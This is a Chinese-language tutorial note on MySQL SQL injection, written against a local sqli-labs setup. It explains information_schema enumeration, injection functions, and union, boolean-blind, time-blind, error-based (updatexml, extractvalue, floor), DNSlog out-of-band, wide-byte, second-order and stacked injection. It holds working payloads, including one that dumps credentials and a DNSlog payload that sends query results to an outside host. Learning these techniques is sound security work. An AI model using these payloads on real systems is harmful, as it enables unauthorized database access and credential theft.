一.什么是SQL注入
SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。本笔记环境为MySQL数据库。
二.MySQL基本增删查改语法
- 创建与删除数据库
语法规则
创建:CREATE DATABASE database_name
删除:DROP DATABASE database_name
- 创建与删除表
语法规则
创建表:
CREATE TABLE table_name(
#字段1 数据类型,
name VARCHAR(20),
id INT(8)
);
- 插入数据
语法规则:INSERT INTO table_name (name,id) VALUES('张三',1);
- 删除数据
语法规则:DELETE FROM table_name WHERE id=1;
- 查询语句
语法规则:SELECT name FROM table_name WHERE id=1;
三.INFORMATION_SCHEMA库
- information_schema数据库保存了整个Mysql中的所有信息(Mysql5.0以上),可以理解为信息数据库
- information_schema数据库表:
1.SCHEMATA表: 保存了Mysql数据库中所有的库名SHOW DATABASES;
的结果就是取自该表的SCHEMA_NAME
查库 :select schema_name from information_schema.schemata;
2.TABLES表: 提供了数据库中每一个库的所有表的名称
查表 :select table_name from information_schema.tables where table_schema='想查表的库名';
3.COLUMNS表: 提供了所有库的所有表的所有字段信息
查列 :select column_name from information_schema.columns where table_name='想查字段的表名';
经过上述三个语句 已经可以查询所有的表和字段信息 就可根据查询语句查询任意信息
栗子: select password,username from security.users;
(查询security库中users表中所有password和username信息)
四.MySQL注入常用函数
-
user();/current_user()
; 查询当前用户
-
@@basedir;
数据库安装路径 /@@datadir;
数据库路径
-
@@version_compile_os;
查询操作系统版本
- 字符串拼接函数
concat
,concat_ws
(用字符将参数拼接起来) ,group_concat
例如:select group_concat(concat_ws('~',username,password)) from security.users;
- 字符串截取函数
substr
(从第n位开始,截取m位):select substr((selsect username from users limit 0,1),1,2);
mid
(从第n位开始,截取m位):select mid('martin',2,3);
left
(从左开始,截取n位):select left('martin',2);
right
(从右开始,截取n位):select right('martin',2);
locate
(返回第一个字符串首次出现在第二个字符出现的位置):select locate('martin','12432martin');
- 返回ASCII字符对应的值(反向用
char
)ascii
:select ascii('a');
ord
:select ord('a');
- 部分计算
select length(database());
当前数据库名称的长度count
计算数目 - 延时函数
select sleep(5);
延时5秒 常用于时间盲注if
:语法if(exp1,exp2,exp3);
如果exp1为真,执行exp2,否则执行exp3 - 常见注释
#
--+(浏览器常用)
/*/
/*!*/
五.常见的SQL注入类型
- 字符型
根据提示 用GET方法提交ID参数
改变URL 发现报错
查看源码
构造URL:http://127.0.0.1/sqli/Less-1/?id=1' and 1 = 1 --+
(1=1 正常 1=2报错)
- 数字型
查看第二关源码
发现与第一关不同的是 id参数数据类型发生了变化 所以构造URL
- 搜索型
常见源码 :$sql="select * from user where password like '%$pwd%' order by password";
若用户输入m'and 1=1 and '%'='
则会构成注入
源码中的语句会变成:select * from user where password like '%m'and 1=1 and '%'='%' order by password
六.常用的注入方式
- union注入
- 使用order by语句进行列数的估计
由此可以看出 列数为3列 - 使用union注入(
union select
或union all select
)
根据前述数据库查询语句 查询有哪些数据库 表名 进而查询详细数据
- 布尔盲注(页面无回显,返回的只有布尔值)
在id后加'
没有出现回显
判断是否存在注入与union类似 可以使用length
来猜取库名 表名长度 如下图
判断出长度 使用substr
来遍历出数据库名的字符
构造:?id=1' and ascii(substr(database(),1,1))>n --+
(使用BP爆破) - 时间盲注 (基于Web界面响应的时间差来判断注入)
看出sleep
函数已经被带入后端处理了 证明存在注入
构造URL:http://localhost/sqli/Less-9/?id=1%27%20and%20if%20(length(database())=8,sleep(5),1)--+
大体步骤同布尔盲注 只是构造的函数和判断方式改变了一下 - DNSlog盲注
利用条件mysql.ini
中secure_file_priv
必须为空
构造payload:load_file(concat('\\\\',执行的语句,'.
自行注册\\abc'))--+
- 报错注入 (公式化注入 直接插入payload)
1)updatexml payload:?id=1' and (updatexml(1,concat(0x7e,(SQL语句),0x7e),1));--+
2)extractvalue
payload:?id=1' and (extractvalue(1,concat(0x7e,(SQL语句),0x7e)));--+
- floor
payload:?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
- 宽字节注入 (gbk要两个asscii组合解码)
特殊字符被转义 如:
因为使用GBK编码 /被合并成了特殊字符
- 二次注入
将存储到数据库中的数据取出在执行 形成的注入 - http请求头注入
抓包修改http请求头 构成注入 - 堆叠注入 (多条sql一起执行 可以修改数据库中的数据)
如图 新建了一个test表目